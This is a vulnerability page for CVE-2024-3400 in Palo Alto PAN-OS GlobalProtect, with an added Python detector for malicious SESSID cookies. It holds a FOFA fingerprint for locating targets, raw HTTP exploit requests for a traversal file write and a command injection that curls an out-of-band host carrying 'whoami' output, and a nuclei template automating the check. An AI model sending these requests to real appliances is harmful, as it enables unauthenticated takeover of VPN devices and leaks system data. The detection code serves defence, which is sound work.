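Command Execution Vulnerability in PAN-OS Security Devices (CVE-2024-3400)

The PAN-OS security device is a VPN appliance from Palo Alto. It lets administrators, wherever they are located, protect network security by extending the next-generation security platform to all users. It uses the platform's application capabilities to understand how applications are being used. It associates traffic with users and devices, and protects that traffic by enforcing security policy with next-generation technology. The Cookie of the login.esp interface of its GlobalProtect feature has an unauthenticated remote command execution vulnerability, through which an attacker can take control of the device.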

fofa

icon_hash="-631559155"

poc

POST /ssl-vpn/hipreport.esp HTTP/1.1
Host: 127.0.0.1
Cookie: SESSID=/../../../var/appweb/sslvpndocs/global-protect/portal/images/hellome1337.txt;
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0


Command Injection

POST /ssl-vpn/hipreport.esp HTTP/1.1
Host: 127.0.0.1
Cookie: SESSID=./../../../opt/panlogs/tmp/device_telemetry/minute/h4`curl${IFS}xxxxxxxxxxxxxxxxx.oast.fun?test=$(whoami)`;
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
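
For detection, both requests above share one trait: the SESSID cookie carries path or shell syntax instead of an opaque token. The following check is an added example, not part of the original page or of any vendor tooling. It flags that pattern in requests captured at a proxy or sensor. The function names, the sample host and the sample cookie values are constructed, and the assumption that a legitimate SESSID never contains such characters is labelled in the code.

```python
import re
from urllib.parse import unquote

# Assumption: a legitimate SESSID is an opaque token with no path or shell syntax.
TRAVERSAL = re.compile(r"(^|[/\\])\.\.([/\\]|$)")
SHELL_META = re.compile(r"[`|&<>]|\$[({]")

def extract_sessid(raw_request):
    """Return the (percent-decoded) SESSID cookie value from a raw request, or None."""
    head = raw_request.replace("\r\n", "\n").split("\n\n", 1)[0]
    for line in head.split("\n")[1:]:          # skip the request line
        name, _, value = line.partition(":")
        if name.strip().lower() != "cookie":
            continue
        for pair in value.split(";"):
            key, _, val = pair.strip().partition("=")
            if key == "SESSID":
                return unquote(val)
    return None

def sessid_findings(raw_request):
    """List the reasons a request's SESSID matches the cookie abuse shown above."""
    sessid = extract_sessid(raw_request)
    findings = []
    if sessid is None:
        return findings
    if "/" in sessid or "\\" in sessid:
        findings.append("path-separator")
    if TRAVERSAL.search(sessid):
        findings.append("traversal")
    if SHELL_META.search(sessid):
        findings.append("shell-metacharacter")
    return findings

def _req(cookie):
    # Constructed sample request; the host and cookie values are made up.
    return ("POST /ssl-vpn/hipreport.esp HTTP/1.1\r\nHost: vpn.example.test\r\n"
            f"Cookie: SESSID={cookie};\r\nContent-Length: 0\r\n\r\n")

BENIGN = _req("3f2b8c1e-7a4d-4c9b-9e2a-5d6f7a8b9c0d")
FILE_WRITE = _req("/../../../tmp/constructed-marker.txt")
INJECTION = _req("./../../../tmp/h`echo${IFS}constructed`")

if __name__ == "__main__":
    for label, req in (("benign", BENIGN), ("file-write", FILE_WRITE),
                       ("injection", INJECTION)):
        print(label, sessid_findings(req))
```
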

CVE-2024-3400.yaml

id: palo-alto-networks-pan-os-command-injection
info:
  name: Palo Alto Networks PAN-OS Command Injection Vulnerability
  author: generated with pdteam AI
  severity: Critical

http:
  - method: POST
    path:
      - "{{BaseURL}}/ssl-vpn/hipreport.esp"
    headers:
      Cookie: "SESSID=/../../../var/appweb/sslvpndocs/global-protect/portal/images/poc.txt;"
      Connection: "close"
      Content-Type: "application/x-www-form-urlencoded"
      Content-Length: "0"
    matchers:
      - type: status
        status:
          - 200

  - method: GET
    path:
      - "{{BaseURL}}/global-protect/portal/images/poc.txt"
    matchers:
      - type: status
        status:
          - 403

Vulnerability source